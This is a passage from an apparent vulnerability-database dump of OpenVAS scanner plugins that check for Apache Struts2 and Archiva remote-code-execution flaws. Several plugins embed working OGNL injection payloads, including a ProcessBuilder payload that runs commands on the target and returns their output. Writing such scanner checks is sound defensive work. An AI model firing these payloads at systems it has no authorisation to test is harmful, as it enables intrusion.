\"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaw is due 
to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2 before 2.3.14.2\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.14.2 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53553\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/25980\");\n script_xref(name : \"URL\" , value : \"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-014.html\");\n script_xref(name : \"URL\" , value : \"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/example/HelloWorld.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm 
the application\nif(asres && \">Struts\" >< asres && \">English<\" >< asres)\n{\n sleep = make_list(3, 5);\n\n foreach i (sleep)\n {\n ## Construct the POST data\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\"+\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\"+\n \"a.lang.Thread%40sleep%28\"+ i +\"000%29%7d\";\n\n ## Construct the POST request\n asReq = string(\"POST /struts2-blank/example/HelloWorld.action HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n asRes = http_send_recv(port:asport, data:asReq);\n stop = unixtime();\n\n if(stop - start < i || stop - start > (i+5)) exit(0); # not vulnerable\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-12T17:27:36", "description": "This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.", "cvss3": {}, "published": "2013-07-23T00:00:00", "type": "openvas", "title": "Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310803837", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803837", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# 
but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803837\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-07-23 17:54:59 +0530 (Tue, 23 Jul 2013)\");\n script_name(\"Apache Struts2 'URL' & 'Anchor' tags Arbitrary Java Method Execution Vulnerabilities (S2-013, S2-014)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53553\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/25980\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-013\");\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_xref(name:\"URL\", value:\"http://metasploit.org/modules/exploit/multi/http/struts_include_params\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and\n is prone to arbitrary java method execution vulnerabilities.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Send a crafted data like system functions\n via HTTP POST request and check whether it is executing the java function or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to improper handling of the\n includeParams attribute in the URL and Anchor tags\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary commands via specially crafted OGNL (Object-Graph Navigation Language)\n expressions.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.0.0 - Struts 2.3.14.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least Struts 2.3.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"www\"))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif(dir == \"/\")\n dir = \"\";\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:port);\n\nreq = http_get(item:dir + \"/example/HelloWorld.action\", port:port);\nres = http_keepalive_send_recv(port:port, data:req);\n\nif(res && \">Struts\" >< res && \">English<\" >< res)\n{\n sleep = make_list(3, 5);\n\n url = dir + \"/struts2-blank/example/HelloWorld.action\";\n foreach i (sleep)\n {\n postdata = \"fgoa=%24%7b%23%5fmemberAccess%5b%22allow\" +\n \"StaticMethodAccess%22%5d%3dtrue%2c%40jav\" +\n \"a.lang.Thread%40sleep%28\" + i + \"000%29%7d\";\n\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n\n start = unixtime();\n http_send_recv(port:port, data:req);\n stop = unixtime();\n\n if(stop - start < i || stop - start > 
(i+5)) exit(99); # not vulnerable\n }\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:12", "description": "Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "openvas", "title": "Apache Archiva Multiple Remote Command Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310103883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103883", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archivo_rce_01_14.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# Apache Archiva Multiple Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103883\");\n script_cve_id(\"CVE-2013-2251\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11867 $\");\n\n script_name(\"Apache Archiva Multiple Remote Command Execution Vulnerabilities\");\n\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/s2-016.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-15 18:13:42 +0100 (Wed, 15 Jan 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache_archiva/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will allow remote attackers to execute arbitrary\ncommands within the context of the affected application.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n script_tag(name:\"insight\", value:\"Apache Archiva use Apache Struts2:\n'In Struts 2 before 2.3.15.1 the information following 'action:', 'redirect:' or\n'redirectAction:' is not properly 
sanitized. Since said information will be evaluated as\nOGNL expression against the value stack, this introduces the possibility to inject server\nside code.'\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"summary\", value:\"Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.\");\n script_tag(name:\"affected\", value:\"Apache Archiva <= 1.3.6\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n\nif( ! port = get_app_port(cpe:CPE) ) exit (0);\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit (0);\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) )\n{\n url = dir +\n '/security/login.action?redirect:' +\n '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27' +\n cmds[cmd] +\n '%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b)' +\n ',%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23' +\n 'matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23' +\n 'matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';\n\n if( buf = http_vuln_check( port:port, url:url, pattern:cmd, bodyonly:TRUE ) )\n {\n buf = str_replace( string:buf, find:raw_string( 0x00 ), replace:\"\");\n report = 'It was possible to execute the command \"' + cmds[cmd] + '\" on the remote\\nhost which produces the following output:\\n\\n' + buf + '\\n';\n security_message( port:port, data: report );\n exit (0);\n }\n}\n\nexit (99);\n", "cvss": 
{"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:33:12", "description": "This host is running Struts and is prone to\n remote command execution vulnerability.", "cvss3": {}, "published": "2010-12-21T00:00:00", "type": "openvas", "title": "Apache Struts2/XWork Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310801663", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801663", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2/XWork Remote Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801663\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-12-21 15:42:46 +0100 (Tue, 21 Dec 2010)\");\n script_name(\"Apache Struts2/XWork Remote Command Execution Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name:\"URL\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Struts and is prone to\n remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST request\n and check whether it is is able to execute remote code or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in 'OGNL' extensive\n expression evaluation capability in XWork in Struts, uses as permissive 
whitelist,\n which allows remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various variables.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n manipulate server-side context objects with the privileges of the user running the application.\");\n\n script_tag(name:\"affected\", value:\"Struts version 2.0.0 through 2.1.8.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts version 2.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\nurl = dir + \"/example/HelloWorld.action\";\n\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"<title>Struts\" >< res ) {\n\n ## OGNL (Object Graph Navigation Language)\n ognl = \"?('\\\\u0023_memberAccess[\\\\'allowStaticMethodAccess\\\\']')(meh)=true&(aaa)(('\"+\n \"\\\\u0023context[\\\\'xwork.MethodAccessor.denyMethodExecution\\\\']\\\\u003d\\\\u0023\" +\n \"foo')(\\\\u0023foo\\\\u003dnew%20java.lang.Boolean('false')))&(asdf)(('\\\\u0023\" +\n \"rt.exit(1)')(\\\\u0023rt\\\\u003d@java.lang.Runtime@getRuntime()))=1\";\n url += ognl;\n\n if( http_vuln_check( port:port, url:url, pattern:'<a href=\".*xwork.MethodAccessor.denyMethodExecution', check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:40:12", "description": "This host is running 
Struts and is prone to remote command\n execution vulnerability.", "cvss3": {}, "published": "2010-09-10T00:00:00", "type": "openvas", "title": "Struts Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2019-03-01T00:00:00", "id": "OPENVAS:1361412562310801441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801441", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_remote_cmd_exec_vuln.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# Struts Remote Command Execution Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801441\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Struts Remote Command Execution Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name:\"URL\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error in 'OGNL' extensive expression evaluation\n capability in XWork in Struts, uses as permissive whitelist, which allows\n remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various variables.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Struts version 2.2 or later\");\n\n script_tag(name:\"summary\", 
value:\"This host is running Struts and is prone to remote command\n execution vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to manipulate server-side context\n objects with the privileges of the user running the application.\");\n script_tag(name:\"affected\", value:\"Struts version 2.0.0 through 2.1.8.1\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) ) exit( 0 );\nver = infos['version'];\ndir = infos['location'];\n\nif( version_in_range( version:ver, test_version:\"2.0\", test_version2:\"2.1.8.1\" ) ) {\n report = report_fixed_ver( installed_version:ver, fixed_version:\"2.2\", install_path:dir );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-02T21:09:49", "description": "This host is running Struts and is prone to\n remote command execution vulnerability.", "cvss3": {}, "published": "2010-12-21T00:00:00", "type": "openvas", "title": "Apache Struts2/XWork Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2017-02-10T00:00:00", "id": "OPENVAS:801663", "href": "http://plugins.openvas.org/nasl.php?oid=801663", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_xwork_cmd_exec_vuln.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Apache Struts2/XWork Remote Command Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# 
Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(801663);\n script_version(\"$Revision: 5263 $\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-21 15:42:46 +0100 (Tue, 21 Dec 2010)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"Apache Struts2/XWork Remote Command Execution Vulnerability\");\n\n script_tag(name: \"summary\" , value:\"This host is running Struts and is prone to\n remote command execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted data via HTTP POST request\n and check whether it is is able to execute remote code or not.\");\n\n script_tag(name: \"insight\" , value:\"The flaw is due to an error in 'OGNL' extensive\n expression evaluation capability in XWork in Struts, uses as permissive whitelist,\n which allows remote attackers to modify 
server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various varibles.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow attackers to\n manipulate server-side context objects with the privileges of the user running the application.\n\n Impact Level: Application.\");\n\n script_tag(name: \"affected\" , value:\"Struts version 2.0.0 through 2.1.8.1\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Struts version 2.2 or later\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name : \"URL\" , value : \"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP Port\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\n## OGNL (Object Graph Navigation Language)\nognl=\"?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\"+\n \"\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023\" +\n \"foo')(\\u0023foo\\u003dnew%20java.lang.Boolean('false')))&(asdf)(('\\u0023\" +\n \"rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1\";\n\n## Send and Receive the response\nreq = http_get(item:string(dir,\"example/HelloWorld.action\"), port:asport);\nres = 
http_keepalive_send_recv(port:asport, data:req);\n\n## Confirm the application\nif(\"<title>Struts\" >< res)\n{\n ## Construct attack request\n url = string(dir,\"example/HelloWorld.action\",ognl);\n\n ## Try attack and check the response to confirm vulnerability\n if(http_vuln_check(port:port, url:url,\n pattern:'<a href=\".*xwork.MethodAccessor.denyMethodExecution',\n check_header: TRUE))\n {\n security_message(asport);\n exit(0);\n }\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:00", "description": "This host is running Struts and is prone to remote command\n execution vulnerability.", "cvss3": {}, "published": "2010-09-10T00:00:00", "type": "openvas", "title": "Struts Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2017-02-10T00:00:00", "id": "OPENVAS:801441", "href": "http://plugins.openvas.org/nasl.php?oid=801441", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_remote_cmd_exec_vuln.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Struts Remote Command Execution Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to manipulate server-side context\n objects with the privileges of the user running the application.\n Impact Level: Application.\";\ntag_affected = \"Struts version 2.0.0 through 2.1.8.1\";\n\ntag_insight = \"The flaw is due to an error in 'OGNL' extensive expression evaluation\n capability in XWork in Struts, uses as permissive whitelist, which allows\n remote attackers to modify server-side context objects and bypass the '#'\n protection mechanism in ParameterInterceptors via various varibles.\";\ntag_solution = \"Upgrade to Struts version 2.2 or later\n For updates refer to http://struts.apache.org/download.cgi\";\ntag_summary = \"This host is running Struts and is prone to remote command\n execution vulnerability.\";\n\nif(description)\n{\n script_id(801441);\n 